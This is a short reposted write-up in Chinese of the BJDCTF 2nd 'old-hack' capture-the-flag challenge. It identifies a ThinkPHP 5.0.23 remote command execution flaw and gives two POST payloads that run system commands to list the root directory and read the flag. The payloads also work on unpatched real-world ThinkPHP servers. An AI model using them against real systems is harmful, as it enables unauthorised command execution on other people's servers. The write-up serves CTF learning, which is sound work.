[BJDCTF 2nd]old-hack

本文轉載自查看原文 2020-03-23 00:26 1702 ctf

進入首頁:
首頁告訴了我們是thinkphp5的漏洞。

知道了是哪個版本的話就搜一搜嘍:最后發現是thinkphp5.0.23的命令執行

payload_1：查看根目錄文件，發現flag位置

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

payload_2：讀取flag

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 BUUOJ [BJDCTF 2nd]elementmaster Buuoj [BJDCTF 2nd]最簡單的misc [BUUOJ記錄] [BJDCTF 2nd]文件探測 [BUUOJ記錄] [BJDCTF 2nd]fake google [BJDCTF 2nd]假豬套天下第一 && [BJDCTF2020]Easy MD5 算法導論（CLRS, 2nd）個人答案 Ch34.1 < > 6.4(Copying pages with PdfCopy)讀書筆記 Python與Hack codeforces hack Hack The Box - 如何開始。